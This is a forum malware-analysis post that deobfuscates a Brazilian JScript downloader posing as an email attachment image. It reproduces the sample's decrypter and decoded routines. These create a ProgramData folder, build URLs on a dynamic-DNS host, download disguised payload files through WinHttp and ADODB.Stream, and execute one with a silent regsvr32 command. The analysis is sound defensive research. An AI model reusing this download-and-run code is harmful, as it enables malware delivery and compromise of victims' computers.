Malware Analysis Analysis of the obfuscation techniques used on Anexo_Email_Visualizar.JPG.js - 8/53

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
From 08-07-2016-10-brazilian-malwares
https://www.hybrid-analysis.com/sam...b1d6ecf4154f32b4529b987271b?environmentId=100

8/53 on virusTotal

I dis-obfuscated this sample. It was funny as it was a kind of challenge to myself

First step, I tried to find / understand the method used.
I then analysed the main decrypter function and sub functions it calls.
=> I simplified their decrypter, and I used it to step by step decrypt all encrypted strings, and remove trash they put (I could decrypt all the encrypted strings only by calling their own VERY obfuscated decrypter function and sub functions, but this was less interesting :p ).

Do not hesitate to click on spoiler :)

(1) Main decrypter function :

This function is mainly used to decrypt string as path, files names, url used (or false data to disturb us ! ).
It calls several other functions, very obfuscated too.
function NaflwigtGwlnigiLpdkqufrRgxqojrn(OafwhmtdhgdfgsaaFaqhlwugt)
{
var LpdkqufrjlkhiuhfueCgxqojr;
var AswjleihylkwhfweBxmohen;
var NaflwigtxsdfserMaqkwugr;
var CgxqojrsdhuiersfEqknugp;
var Faqhlwugtsdhu11i11ersfGwlnigi;
var DpqgkqufrhsdyeHafleiht;
var EqknugprftggeLpdkqufr;
var Eqknugpd7heNaflwigt;
Faqhlwugtsdhu11i11ersfGwlnigi = "";
LpdkqufrjlkhiuhfueCgxqojr = "GwlnigiNaflwigtIsqxeihy";
AswjleihylkwhfweBxmohen = "";
Eqknugpd7heNaflwigt = "GwlnigiNaflwigtIsqxeihy";
NaflwigtxsdfserMaqkwugr = Dpqgkqufrjhs11ksMaqkwugr;
LpdkqufrjlkhiuhfueCgxqojr = "LpdkqufrDpqgkqufrMaqkwugr";
CgxqojrsdhuiersfEqknugp = HafleihtnishyswsIsqxeihy(OafwhmtdhgdfgsaaFaqhlwugt,Dpqgkqufrjhs11ksMaqkwugr,EqknugprftggeLpdkqufr);
LpdkqufrjlkhiuhfueCgxqojr = "GwlnigiNaflwigtIsqxeihy";
LpdkqufrjlkhiuhfueCgxqojr = "GwlnigiNaflwigtIsqxeihy";
DpqgkqufrhsdyeHafleiht = "GwlnigiFaqhlwugtIsqxeihy";
OafwhmtdhgdfgsaaFaqhlwugt = EqknugpasheywsLpdkqufr(OafwhmtdhgdfgsaaFaqhlwugt,GwlnigiogijkoiytiLpdkqufr);
LpdkqufrjlkhiuhfueCgxqojr = "CgxqojrDpqgkqufrIsqxeihy";
while (OafwhmtdhgdfgsaaFaqhlwugt.length > Dpqgkqufrjhs11ksMaqkwugr){
LpdkqufrjlkhiuhfueCgxqojr = "GwlnigiNaflwigtIsqxeihy";
Faqhlwugtsdhu11i11ersfGwlnigi = Faqhlwugtsdhu11i11ersfGwlnigi + Kkxqojrjhskisd33fEqknugp(OafwhmtdhgdfgsaaFaqhlwugt,CgxqojrsdhuiersfEqknugp,Dpqgkqufrjhs11ksMaqkwugr,"LpdkqufrAswjleihyDpqgkqufr",Eqknugpd7heNaflwigt,"GwlnigiNaflwigtJsqgxeohy");
OafwhmtdhgdfgsaaFaqhlwugt = GwlnigijppqoeuyaHafleiht(OafwhmtdhgdfgsaaFaqhlwugt,EqknugpjhgdfsdMaqkwugr,DpqgkqufrhsdyeHafleiht);
}
LpdkqufrjlkhiuhfueCgxqojr = "EqknugpDpqgkqufrOafwhmtd";
return Faqhlwugtsdhu11i11ersfGwlnigi;
}


function HafleihtnishyswsIsqxeihy(IsqxeihylkjdirhOafwhmtd, LpdkqufrhuhudysuHafleiht, KkxqojrkjsdhieDpqgkqufr)
{
var Eqknugpshiusidjd8Lpdkqufr;
var Cgxqojrd8Aswjleihy;
Cgxqojrd8Aswjleihy = "BxmohenAswjleihyIsqxeihy";
Eqknugpshiusidjd8Lpdkqufr = MaqkwugrkjhiuryieIsqxeihy(IsqxeihylkjdirhOafwhmtd,LpdkqufrhuhudysuHafleiht,Cgxqojrd8Aswjleihy) - FaqhlwugtkjsoduyerffMaqkwugr("BxmohenAswjleihyIsqxeihy","HafleihtHafleihtLpdkqufr","KkxqojrDpqgkqufrLpdkqufr","BxmohenDpqgkqufrEqknugp");
return Eqknugpshiusidjd8Lpdkqufr;
}

function EqknugpasheywsLpdkqufr(HafleihtakjshkdhGwlnigi, HafleihtashiuhaiuFaqhlwugt )
{
var DpqgkqufrshiusdhiuseBxmohen;
DpqgkqufrshiusdhiuseBxmohen = HafleihtakjshkdhGwlnigi.substring(HafleihtashiuhaiuFaqhlwugt);
return DpqgkqufrshiusdhiuseBxmohen;
}

function Kkxqojrjhskisd33fEqknugp(Faqhlwugtngste4asGwlnigi,IsqxeihyvnjandBxmohen, Kkxqojrhbyesg7Faqhlwugt,BxmohendsjheFaqhlwugt,Eqknugph56s6sMaqkwugr,CAHVE3hs6s6Eqknugp)
{
var Maqkwugrlkhsa11uyeLpdkqufr;
var EqknugpfdjitueHafleiht;
var BxmohensdnfiureIsqxeihy;
var DpqgkqufrsdhurhureMaqkwugr;
var Faqhlwugtjd8rreIsqxeihy;
var MaqkwugrsjfhreLpdkqufr;
Maqkwugrlkhsa11uyeLpdkqufr = "LpdkqufrOafwhmtdPlmeheiq";
EqknugpfdjitueHafleiht = "BxmohenLpdkqufrFaqhlwugt";
BxmohensdnfiureIsqxeihy = "BxmohenLpdkqufrDpqgkqufr";
DpqgkqufrsdhurhureMaqkwugr = "LpdkqufrEqknugpDpqgkqufr";
Faqhlwugtjd8rreIsqxeihy = "EqknugpAswjleihyDpqgkqufr";
Maqkwugrlkhsa11uyeLpdkqufr = String.fromCharCode( (Rgxqojrnkjre34fMaqkwugr(Faqhlwugtngste4asGwlnigi,Kkxqojrhbyesg7Faqhlwugt,EqknugpfdjitueHafleiht,"AswjleihyLpdkqufrFaqhlwugt") ) * CgxqojrkdjgdteQxbedyq + ( PlmeheiqkjjsuuwuhuhsfCgxqojr(Faqhlwugtngste4asGwlnigi,DpqgkqufrsdhurhureMaqkwugr,Faqhlwugtjd8rreIsqxeihy,MaqkwugrsjfhreLpdkqufr,"AswjleihyHafleihtFaqhlwugt","MaqkwugrHafleihtFaqhlwugt","CgxqojrHafleihtMaqkwugr") ) - IsqxeihyvnjandBxmohen - edCgxqojrkjdi1111khsdGwlnigi);
return Maqkwugrlkhsa11uyeLpdkqufr;
}

function GwlnigijppqoeuyaHafleiht(GwlnigiiuhrhfHafleiht, GwlnigihtshrhfMaqkwugr, EqknugpadhsiKkxqojr )
{
var DpqgkqufrkjjystsraaEqknugp;
DpqgkqufrkjjystsraaEqknugp = GwlnigiiuhrhfHafleiht.substring(GwlnigihtshrhfMaqkwugr);
return DpqgkqufrkjjystsraaEqknugp;
}

function MaqkwugrkjhiuryieIsqxeihy(EqknugpueryiueKkxqojr, FaqhlwugtkjsdheijhjshjsKkxqojr, DpqgkqufrkjaiyeHafleiht )
{
var EqknugpiuweyiwyNaflwigt;
EqknugpiuweyiwyNaflwigt = EqknugpueryiueKkxqojr.charCodeAt(FaqhlwugtkjsdheijhjshjsKkxqojr);
return EqknugpiuweyiwyNaflwigt;
}

function Rgxqojrnkjre34fMaqkwugr(Lpdkqufrnijsn44isKkxqojr, Cgxqojr8fheywDpqgkqufr, FaqhlwugtsjkdhiwLpdkqufr, EqknugpwLpdkqufr)
{
var Naflwigtbae3w8usPlmeheiq;
Naflwigtbae3w8usPlmeheiq = "BxmohenEqknugpFaqhlwugt";
Naflwigtbae3w8usPlmeheiq = Lpdkqufrnijsn44isKkxqojr.charCodeAt(Cgxqojr8fheywDpqgkqufr)-FaqhlwugtkjsoduyerffMaqkwugr("BxmohenAswjleihyIsqxeihy","HafleihtHafleihtLpdkqufr","IsqxeihyHafleihtEqknugp","BxmohenDpqgkqufrEqknugp") ;
return Naflwigtbae3w8usPlmeheiq;
}

function PlmeheiqkjjsuuwuhuhsfCgxqojr(BxmohennijsnisAswjleihy, Cgxqojrkjsd2yeKkxqojr, DpqgkqufrjndhueCgxqojr, DpqgkqufrjdhyeHafleihtgr, Dpqgkqufrash64d5Bxmohen, Bxmohenf4d35Eqknugp, Kkxqojrdfge5Dpqgkqufr)
{
var Dpqgkqufrba8usFaqhlwugt;
var GwlnigikdsjrsBxmohen;
var Dpqgkqufr5jahursEqknugp;
var FaqhlwugtsdjuehMaqkwugr;

Dpqgkqufrba8usFaqhlwugt = "BxmohenEqknugpFaqhlwugt";
FaqhlwugtsdjuehMaqkwugr = "HafleihtLpdkqufrFaqhlwugt";
GwlnigikdsjrsBxmohen = "DpqgkqufrGwlnigiPlmeheiq" + Dpqgkqufrba8usFaqhlwugt;
Dpqgkqufr5jahursEqknugp = "DpqgkqufrGwlnigiGwlnigi" + DpqgkqufrjndhueCgxqojr;
Dpqgkqufrba8usFaqhlwugt = Dpqgkqufr5jahursEqknugp + GwlnigikdsjrsBxmohen + Dpqgkqufrba8usFaqhlwugt;
Dpqgkqufrba8usFaqhlwugt = BxmohennijsnisAswjleihy.charCodeAt(GwlnigiogijkoiytiLpdkqufr)-FaqhlwugtkjsoduyerffMaqkwugr("BxmohenAswjleihyIsqxeihy","HafleihtHafleihtLpdkqufr","IsqxeihyHafleihtEqknugp","BxmohenDpqgkqufrEqknugp") ;
return Dpqgkqufrba8usFaqhlwugt;
}

function FaqhlwugtkjsoduyerffMaqkwugr(OafwhmtdueretfdfAswjleihy,DpqgkqufrhaguydLpdkqufr,Aswjleihyh45sMaqkwugr,DpqgkqufrjdyePlmeheiq)
{
var EqknugpiuwsdjhirueCgxqojr;
EqknugpiuwsdjhirueCgxqojr = "BxmohenEqknugpFaqhlwugt";
EqknugpiuwsdjhirueCgxqojr = Hafleihtjhs11ksPlmeheiq;
return EqknugpiuwsdjhirueCgxqojr;
}

I wanted to simplify all, to have a 'more easy to read' single function
This is the simplified decrypter function I made, more understandable, no ? :p
function NaflwigtGwlnigiLpdkqufrRgxqojrn( a_string )
{
var first_char;
var current_decoded;

current_decoded = "";

first_char_before_loop_less_65 = a_string.charCodeAt(0) - 65;

a_string = a_string.substring(1);

while (a_string.length > 0){

current_decoded = current_decoded + String.fromCharCode( (a_string.charCodeAt(0) -65 ) * 25 + ( a_string.charCodeAt(1)-65 ) - first_char_before_loop_less_65 - 10);
a_string = a_string.substring(2);
}

return current_decoded;
}

(2) Call to decrypter function :

There are a lot of calls to the decrypter function that only product unused data.

One good example is :

HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("OEVFBFRFMFDEYFBFCFDEYFNFDFPFNFDFSDBDAFNFBFN") ;
=> "afvqhdfghdrhtrhw43rfr"

All the HafleihtskdjgkGwlnigi=HafleihtskdjgkGwlnigi("....") are fake data
(56 times) => you can remove all occurrence :)

There are also other fake var / content
So it makes harder to find the real important calls / var / content.

Examples with useful data :

NaflwigtGwlnigiLpdkqufrRgxqojrn("XEEECER"); => "GET"
NaflwigtGwlnigiLpdkqufrRgxqojrn("SDYDWEM"); => "GET"
NaflwigtGwlnigiLpdkqufrRgxqojrn("BDHDFDU"); => "GET"
NaflwigtGwlnigiLpdkqufrRgxqojrn("ADGDEDT"); => "GET"
=> yes, same result with different obfuscated strings (to slow dis-obfuscating ... )

Isqxeihyh4h4h4Bxmohen = NaflwigtGwlnigiLpdkqufrRgxqojrn("CDYDUELFBEREYFDCIDP");
Kkxqojrh4h3h2Bxmohen = NaflwigtGwlnigiLpdkqufrRgxqojrn("IETFJFMFEFHFA");
Eqknugpgja1111jhauNaflwigt = Isqxeihyh4h4h4Bxmohen+Kkxqojrh4h3h2Bxmohen;
ashtFaqhlwugtewaaGwlnigi = FaqhlwugtdfiuerBxmohen("RgxqojrnshuPlmeheiq"); => WScript.ScriptFullName
ppjjhMaqkwugrjjhGwlnigi = WScript.CreateObject(Eqknugpgja1111jhauNaflwigt);

"WScript.N" + "etwork "=> WScript.CreateObject("WScript.Network");

ghetstHafleihtytqerGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("NEGEWFMFDFKFO");
ghetstHafleihtytqerGwlnigi = ghetstHafleihtytqerGwlnigi+
NaflwigtGwlnigiLpdkqufrRgxqojrn("LFBFGEYCRDQFBFEEWEE");
ghetstHafleihtytqerGwlnigi = ghetstHafleihtytqerGwlnigi+
NaflwigtGwlnigiLpdkqufrRgxqojrn("AFGFAFBELETDOEIEQELEJFB");
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("YFMFLFNFJFNFKGFGAGFFKFXGAGFFKFXGF");
sDpqgkqufr = WScript.CreateObject(ghetstHafleihtytqerGwlnigi);

"Script" + "ing.FileS" + "ystemObject" => WScript.CreateObject("Scripting.FileSystemObject");

A lot of parts work in the same way

Another example of how obfuscated is their file :
3 different parts for the same result :
if (edNaflwigtjy3gaFaqhlwugt.FileExists(ajgMaqkwugrshdkNameGwlnigi + NaflwigtGwlnigiLpdkqufrRgxqojrn("HEJEJEOFJEW") + NaflwigtGwlnigiLpdkqufrRgxqojrn("FEPFKFK") + EqknugpammfreadFaqhlwugt + NaflwigtGwlnigiLpdkqufrRgxqojrn("HCNFAFDEU"))){
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("DEKEPFGFBFHCPEPEQFDEQFDENEQENFDCOFCEPFC") ;
if((ashtFaqhlwugtewaaGwlnigi != ajgMaqkwugrshdkNameGwlnigi + NaflwigtGwlnigiLpdkqufrRgxqojrn("VEXEXFVGCFVFWFHFPDCGAFVFI"))){
KkxqojrkkkBxmohen("MaqkwugrDpqgkqufr");
}
}

if(edNaflwigtjy3gaFaqhlwugt.FileExists(ajgMaqkwugrshdkNameGwlnigi + NaflwigtGwlnigiLpdkqufrRgxqojrn("JELELEQFLEY") + NaflwigtGwlnigiLpdkqufrRgxqojrn("LEVFQFQ") + EqknugpammfreadFaqhlwugt + NaflwigtGwlnigiLpdkqufrRgxqojrn("OCUFHFKFC"))){
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("DEKEPFGFBFHFCEOFHFCEPFDENEQFHCPCOFEEQCOCOFCEPFC") ;

if((ashtFaqhlwugtewaaGwlnigi != ajgMaqkwugrshdkNameGwlnigi + NaflwigtGwlnigiLpdkqufrRgxqojrn("BEDEDFBFHFBFCEMEUCHFFFBEN"))){
KkxqojrkkkBxmohen("CgxqojrEqknugp");
}
}

if(edNaflwigtjy3gaFaqhlwugt.FileExists(ajgMaqkwugrshdkNameGwlnigi + NaflwigtGwlnigiLpdkqufrRgxqojrn("CEEEEEJFEEREMFHFH") + EqknugpammfreadFaqhlwugt + NaflwigtGwlnigiLpdkqufrRgxqojrn("CCIEUEXEP"))){
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("QEXFDFTFOFUDCDEFRDEDCDDFRDEFUFCFEDDDCFPFDFP") ;
if((ashtFaqhlwugtewaaGwlnigi != ajgMaqkwugrshdkNameGwlnigi + NaflwigtGwlnigiLpdkqufrRgxqojrn("XFAFAFXGEFXFYFJFRDEGCFXFK"))){
KkxqojrkkkBxmohen("CgxqojrGwlnigi");
}
}

if (Objet_Scripting_FileSystemObject.FileExists("C:\ProgramData\UserName\auidxx60.log")){
if((WScript_ScriptFullName != "C:\ProgramData\UserName\system.wsf")){
WScript_Quit(0);
}
}


(3) Path :

NaflwigtGwlnigiLpdkqufrRgxqojrn("YEBDRFBFBEOFXFUFMFXFGFSECFGGAFGFBFB");
=> "C:\\ProgramData\\"

This way User_Path = "C:\ProgramData\[UserName]\" was found as main path used.
Isqxeihyh4h4h4Bxmohen = NaflwigtGwlnigiLpdkqufrRgxqojrn("CDYDUELFBEREYFDCIDP");
Kkxqojrh4h3h2Bxmohen = NaflwigtGwlnigiLpdkqufrRgxqojrn("IETFJFMFEFHFA");
Eqknugpgja1111jhauNaflwigt = Isqxeihyh4h4h4Bxmohen+Kkxqojrh4h3h2Bxmohen;
ashtFaqhlwugtewaaGwlnigi = FaqhlwugtdfiuerBxmohen("RgxqojrnshuPlmeheiq");
ppjjhMaqkwugrjjhGwlnigi =
WScript.CreateObject(Eqknugpgja1111jhauNaflwigt);
// UserName

dfDpqgkqufrregqqKkxqojr = ppjjhMaqkwugrjjhGwlnigi.UserName;
ajgMaqkwugrshdkNameGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("YEBDRFBFBEOFXFUFMFXFGFSECFGGAFGFBFB") + ppjjhMaqkwugrjjhGwlnigi.UserName;

// "C:\ProgramData\[UserName]"
Objet_Network = WScript.CreateObject("WScript.Network");
User_Path = "C:\ProgramData\" + Objet_Network.UserName
;
=> created if not exist
if(! (sDpqgkqufr.FolderExists(ajgMaqkwugrshdkNameGwlnigi))){
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("RFPFDFFFSDDDFDEFSDFFSFSFSFVFQFP");
sDpqgkqufr.CreateFolder(ajgMaqkwugrshdkNameGwlnigi);
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("VFTFHGAFUFWDHDIFWDJDJDIDJFT");
}
if(! (Scripting_FileSystemObject.FolderExists(User_Path))){
Scripting_FileSystemObject.CreateFolder(User_Path);
}
The most part of the files downloaded will be put there.

(4) Main log files :

log_file_r2 = Objet_Scripting_FileSystemObject.OpenTextFile("C:\ProgramData\UserName\r2.log",8,true,false);
log_file_r2.WriteLine(WScript_ScriptFullName);
log_file_r2.Close();

if((WScript_ScriptFullName != "C:\ProgramData\UserName\system.wsf"))){
log_file_auid = Objet_Scripting_FileSystemObject.OpenTextFile("
C:\ProgramData\UserName\auid.log",8,true,false);
log_file_auid.WriteLine(WScript_ScriptFullName);
log_file_auid.Close();
}
log_file_auidxx60 = Objet_Scripting_FileSystemObject.OpenTextFile("
C:\ProgramData\UserName\auidxx60.log",8,true,false);
log_file_auidxx60.WriteLine(WScript_ScriptFullName);
log_file_auidxx60.Close();

(5) URLs / files :

With the decrypter, by several calls, concatenation :

Loop with parameter i to construct several urls to try to download files.
i >= 0, 1 , 2
"https://AswjleihyKkxqojr.infernew0"+ i + ".dynamicdns.biz/04/?v=60&x1x2c=[fileID]";
(i modified something in url to security purpose !!!)
=> For each url, it try to download below files if not existing on pc
"C:\ProgramData\UserName\UserNamexmda.jpg" ( if one of below files is found, the function used to download this first file is overwritten )
"C:\ProgramData\UserName\UserNamexmdb.jpg"
"C:\ProgramData\UserName\UserNamexmdc.jpg"
"C:\ProgramData\UserName\guildwg.gif"
"C:\ProgramData\UserName\UserNamewg.gif"
Dpqgkqufrh4h4aah4Eqknugp = ajgMaqkwugrshdkNameGwlnigi+LpdkqufrsljhirueCgxqojr+dfDpqgkqufrregqqKkxqojr+IsqxeihysjjauayaqHafleiht;
//"C:\\ProgramData\\UseName" + "\\" + UserName + "xmda.jpg";
Dpqgkqufrh4h4bbh4Eqknugp = Faqhlwugtkjst4jayMaqkwugr + KkxqojrssgtsyyaqFaqhlwugt + NaflwigtGwlnigiLpdkqufrRgxqojrn("IDTFFESFAFGFKEUFHFNFNFNEP");
//url from where to download the file :
"hxxps://AswjleihyKkxqojr.infernew0"+ i + ".dynamicdns.biz/04/?v=60&x1x2c=[fileID]";

(i modified something in url to security purpose !!!)
Eqknugpkhs1111gyKkxqojr = NaflwigtGwlnigiLpdkqufrRgxqojrn("MFBFNFNFJ");
// "http"
CgxqojrdijurngyMaqkwugr = NaflwigtGwlnigiLpdkqufrRgxqojrn("LFLDECSCSDLFLFPFCFEEWFBFAFR");
// "s://Aswjleihy"
Gwlnigisjorkrj88dqJsqgxeohy = NaflwigtGwlnigiLpdkqufrRgxqojrn("CDMETFHFAEXESFBCIEREWEOENFBEWENFGCK");
// "Kkxqojr.infernew0"
Lpdkqufruisuishjsj88dqMaqkwugr = 200+100+55;
QxbedyqdshyFaqhlwugt = NaflwigtGwlnigiLpdkqufrRgxqojrn("NCTEXFTFIEUFHFD");
// ".dynami"
DpqgkqufrnsdhteIsqxeihy = NaflwigtGwlnigiLpdkqufrRgxqojrn("JESETFEFJCPEREY");
// "cdns.bi"
BxmohenfurKkxqojr = NaflwigtGwlnigiLpdkqufrRgxqojrn("PFWCWCXDCCW");
// "z/04/"

function EqknugpjdjuhheMaqkwugr(BxmohenhjsyePlmeheiq)
{
var HafleihtdnuiehDpqgkqufr;
var LpdkqufrsdferhNaflwigt;
try
{
LpdkqufrsdferhNaflwigt = Eqknugpkhs1111gyKkxqojr+ CgxqojrdijurngyMaqkwugr + Gwlnigisjorkrj88dqJsqgxeohy + BxmohenhjsyePlmeheiq;
HafleihtdnuiehDpqgkqufr = LpdkqufrsdferhNaflwigt + QxbedyqdshyFaqhlwugt + DpqgkqufrnsdhteIsqxeihy+BxmohenfurKkxqojr;
//
}
catch (Kkxqojr)
{

}
return HafleihtdnuiehDpqgkqufr;
// "https://AswjleihyKkxqojr.infernew0"+ i + ".dynamicdns.biz/04/"
// with i : value from a Loop
}

try // try to download the file, and if all is ok, save it to the PC
{
if (Cgxqojrh46sDpqgkqufr(Dpqgkqufrh4h4aah4Eqknugp) < Plmeheiqneysg3Bxmohen){
MaqkwugrllaakkssdKkxqojr(Dpqgkqufrh4h4bbh4Eqknugp, Dpqgkqufrh4h4aah4Eqknugp);
}
}
catch (Kkxqojr)
{
}
(6) Method Used to download :

"WinHttp.WinHttpRequest.5.1"
MaqkwugrxxhgsreIsqxeihy = NaflwigtGwlnigiLpdkqufrRgxqojrn("KEHFAFFDR");
MaqkwugrxxhgsreIsqxeihy = MaqkwugrxxhgsreIsqxeihy + NaflwigtGwlnigiLpdkqufrRgxqojrn("KFLFLFHCQEHFA");
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("QEXFDFTFDFBFEFQFBFEFQFDFBFOFUDDDCFPFDFP") ;
MaqkwugrxxhgsreIsqxeihy = MaqkwugrxxhgsreIsqxeihy + NaflwigtGwlnigiLpdkqufrRgxqojrn("RFMDYFS");
MaqkwugrxxhgsreIsqxeihy = MaqkwugrxxhgsreIsqxeihy + NaflwigtGwlnigiLpdkqufrRgxqojrn("QFRFNEI");
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("KEREWFNFIFOEXFKEUEXEWFKEUEXEUEWEXFKEUEWEXCWCVFJEWFJ") ;
MaqkwugrxxhgsreIsqxeihy = MaqkwugrxxhgsreIsqxeihy + NaflwigtGwlnigiLpdkqufrRgxqojrn("IETFGFK");
MaqkwugrxxhgsreIsqxeihy = MaqkwugrxxhgsreIsqxeihy + NaflwigtGwlnigiLpdkqufrRgxqojrn("GERFGFH");
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("NEUFAFQFLFRDAFNEXFBEXFBFNEXFAFBCYFMFAFM") ;
MaqkwugrxxhgsreIsqxeihy = MaqkwugrxxhgsreIsqxeihy + NaflwigtGwlnigiLpdkqufrRgxqojrn("LCRCY");
MaqkwugrxxhgsreIsqxeihy = MaqkwugrxxhgsreIsqxeihy + NaflwigtGwlnigiLpdkqufrRgxqojrn("RCXDB");


MaqkwugrxxhgsreIsqxeihy => "WinHttp.WinHttpRequest.5.1"

"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1)"

function MaqkwugrllaakkssdNaflwigt(sAswjleihy, sdGwlnigiawIsqxeihy){
var CgxqojrdjfgaaKkxqojr;
var sxJsqgxeohytrAHafleiht;
var stDpqgkqufrrBIsqxeihy;
var stNaflwigtreetrKkxqojr;
var stBxmohenrttrDLpdkqufr;
var cxjfkgriqdafGwlnigi;

try
{
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("TFBFGFWFRFXDGDFFSFGFS") ;
sxJsqgxeohytrAHafleiht = NaflwigtGwlnigiLpdkqufrRgxqojrn("ADGDEDT");
stDpqgkqufrrBIsqxeihy = "";
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("OEVFBFRFMFSDBDAFNFBFN") ;
stNaflwigtreetrKkxqojr = DpqgkqufrjsdhuiCgxqojr;
stBxmohenrttrDLpdkqufr = akDpqgkqufrjsdiGwlnigi+akDpqgkqufrjsdiGwlnigi+akDpqgkqufrjsdiGwlnigi+akDpqgkqufrjsdiGwlnigi;
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("XFFFKGBFVGCDKDJFWFKFW") ;
CgxqojrdjfgaaKkxqojr = WScript.CreateObject(MaqkwugrxxhgsreIsqxeihy);
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("EEQEPCOFCFDEQ");
CgxqojrdjfgaaKkxqojr.settimeouts(Gwlnigikjdyhe5gahsCgxqojr, 34569, Gwlnigikjdyhe5gahsCgxqojr, IsqxeihykjshsMaqkwugr);
CgxqojrdjfgaaKkxqojr.Option(AswjleihyutywreNaflwigt) = stNaflwigtreetrKkxqojr;
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("QEXFQFBFEDBDDDE");
CgxqojrdjfgaaKkxqojr.Option(Cgxqojrggrres1Lpdkqufr) = stBxmohenrttrDLpdkqufr;
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("VFDFIFJDGDJFW");
CgxqojrdjfgaaKkxqojr.Option(Aswjleihyy356haeKkxqojr) = BxmohentryetrdEqknugp;
CgxqojrdjfgaaKkxqojr.Option(CgxqojrolkijueBxmohen) = BxmohentryetrdEqknugp;
CgxqojrdjfgaaKkxqojr.Open(sxJsqgxeohytrAHafleiht, sAswjleihy, CgxqojrertydfgDpqgkqufr);
CgxqojrdjfgaaKkxqojr.Send(stDpqgkqufrrBIsqxeihy);
if((CgxqojrdjfgaaKkxqojr.Status == aEqknugpoeywMaqkwugr+KkxqojrkwerwweDpqgkqufr)){
MaqkwugrllaakkssdKkxqojr = CgxqojrdjfgaaKkxqojr.ResponseBody;
try
{
Gwlnigishfiw11kjshasEqknugp(CgxqojrdjfgaaKkxqojr.ResponseBody,sdGwlnigiawIsqxeihy);
}
catch (Kkxqojr)
{

}
}
try
{
object_http = WScript.CreateObject("WinHttp.WinHttpRequest.5.1");
object_http.settimeouts(34871, 34566, 34871, 32876);
object_http.Option(0) = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1)";
object_http.Option(4) = 13056;
object_http.Option(6) = true;
object_http.Option(12) = true;
object_http.Open("GET, url, false);
object_http.Send("");
if((object_http.Status == 200)){
try
{
Create_open_write_save_ADODB_stream(object_http.ResponseBody,file_path);
}
catch (Kkxqojr)
{
}

}

(7) Method Used to save files :

"ADODB.Stream"
option => 2 : Overwrites the file with the data from the currently open Stream object, if the file already exists
function Gwlnigishfiw11kjshasEqknugp(DpqgkqufrkjsadhieGwlnigi, NaflwigtkjsdsfgerieKkxqojr){
var cxjfkgriqdafGwlnigi;

try
{
cxjfkgriqdafGwlnigi = WScript.CreateObject(fdKkxqojrjkuuqFaqhlwugt);
cxjfkgriqdafGwlnigi.Type = ajskCgxqojrgfiuyriw4355Oafwhmtd;
cxjfkgriqdafGwlnigi.Open();
GwlnigisdsfghlskEqknugp(cxjfkgriqdafGwlnigi, DpqgkqufrkjsadhieGwlnigi, NaflwigtkjsdsfgerieKkxqojr);
}
catch (Kkxqojr)
{

}
}
function GwlnigisdsfghlskEqknugp(cxjfkgriqdafGwlnigi, DpqgkqufrkjsadhieGwlnigi, NaflwigtkjsdsfgerieKkxqojr){
try
{
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("RFFFQDCDDDEFQFVFDFSFVFRFVDEDDFSFVDFDD");
cxjfkgriqdafGwlnigi.Write(DpqgkqufrkjsadhieGwlnigi);
cxjfkgriqdafGwlnigi.SaveToFile(NaflwigtkjsdsfgerieKkxqojr, aKkxqojrsdhgfqiutrHafleiht);
}
catch (Kkxqojr)
{

}
}
function Create_open_write_save_ADODB_stream(object_http.ResponseBody, file_path){
var Objet_ADODB_Stream;

try
{
Objet_ADODB_Stream =
WScript.CreateObject( "ADODB.Stream");
Objet_ADODB_Stream.Type = 1;
Objet_ADODB_Stream.Open();
write_save_ADODB_stream(Objet_ADODB_Stream, object_http.ResponseBody, file_path);
}
catch (Kkxqojr)
{

}
}
function write_save_ADODB_stream(Objet_ADODB_Stream, object_http.ResponseBody, file_path){
try
{

Objet_ADODB_Stream.Write(object_http.ResponseBody);
Objet_ADODB_Stream.SaveToFile(file_path, 2);
}
catch (Kkxqojr)
{

}
}

(8) cmd used

The malware end with :

file = "C:\ProgramData\UserName\UserNamewg.gif";

WScript.Sleep_(3535);
WScript.Sleep_(3535);

if (if_file_exist_return_10_else_0(file) > 2){
run_cmd(file);


function MaqkwugrjhgdteAswjleihy(Maqkwugrndsggste4asGwlnigi)
{
try
{
Eqknugphsyr66nnfCgxqojr = new ActiveXObject(NaflwigtGwlnigiLpdkqufrRgxqojrn("OELEHEXFNFEFLFPCUEHFDFAFHFH"));
Eqknugphsyr66nnfCgxqojr.run(aKkxqojrgefGwlnigiuy + Bxmohenh5tgpIsqxeihy + Maqkwugrndsggste4asGwlnigi , Eqknugpd7d7Cgxqojr, true);
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("TFBFGFWFRFXDGDFFSFGFS");
KkxqojrkkkBxmohen("MaqkwugrGwlnigi");
}
catch (Kkxqojr)
{
}
function run_cmd(file)
{
try
{
Objet_Shell = new ActiveXObject("WScript.Shell");
Objet_Shell.run("
cmd /c start regsvr32.exe /s C:\ProgramData\UserName\UserNamewg.gif" , 0, true);
WScript_Quit(0);
}
catch (Kkxqojr)
{
}

Note :

WScript.sleep(3535) is used 8 times
HafleihthsdyeIsqxeihy = 3535;

